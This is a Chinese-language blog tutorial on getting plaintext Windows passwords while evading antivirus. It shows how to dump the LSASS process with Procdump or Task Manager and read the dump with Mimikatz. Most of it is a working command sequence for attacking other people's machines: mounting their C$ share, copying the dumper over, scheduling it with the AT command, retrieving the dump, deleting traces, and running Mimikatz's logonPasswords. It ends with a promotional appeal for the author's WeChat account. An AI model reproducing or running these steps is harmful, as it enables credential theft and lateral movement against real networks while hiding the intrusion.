# 利用procdump+Mimikatz 绕过杀软获取Windows明文密码

Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址 (opens new window))版本,然后处理dump的LSASS进程内存文件就行!

那么如何dump LSASS进程内存呢。可以通过以下方式:

1.对于NT6可以使用windows自带的功能进行dump:

任务管理器—进程—显示所有用户进程—找到lsass—右键“创建转储文件”

img

img

2.对于NT5可以使用微软的Procdump工具(这当然不会引起杀软报毒)

Procdump: http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

命令如下:

Procdump.exe -accepteula -ma lsass.exe lsass.dmp
1

img

我们运行mimikatz的平台(platform)要与进行dump的系统(source dump)兼容,兼容性如下:

img

得到dump后的文件我们就能使用mimikatz获取密码了。我们dump自己的电脑当然没什么意思,下面介绍怎么dump别人的电脑。

首先我们需要能够访问别人的C$(通常只有管理员可以)

net use \\TARGETBOX\C$ /user:DOMAIN\Username password
dir \\TARGETBOX\C$
1
2

如果上述命令好使的话,我们接下来使用AT命令。

at \\TARGETBOX
1

接下来我们可以在目标主机上开展工作了。

mkdir \\TARGETBOX\C$\Temp
dir \\TARGETBOX\C$\Temp
copy c:\temp\procdump.exe \\TARGETBOX\C$\Temp
copy c:\temp\procdump.bat \\TARGETBOX\C$\Temp
1
2
3
4

procdump.bat中的内容如下

@echo off
C:\temp\procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
1
2

这里一个技巧就是dump得到的文件名中有“计算机名”,这样可以让我们区分是来dump的文件自哪台电脑。

我们继续。 使用 net time 来获知远程主机上的时间。

net time \\TARGETBOX
at \\TARGETBOX 13:52 C:\Temp\procdump.bat
1
2

复制dump的文件,然后清理痕迹

dir \\TARGETBOX\C$\Temp
copy \\TARGETBOX\C$\Temp\*lsass.dmp C:\temp\output\
rmdir /s \\TARGETBOX\C$\Temp
1
2
3

之后我们就可以运行我们电脑上的Mimikatz,对得到的.dmp文件进行分析了(注意上文提到的兼容性)。命令如下:

mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full
1
2
3

到此结束!我们得到了远程主机上的密码。

# 写在最后

如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!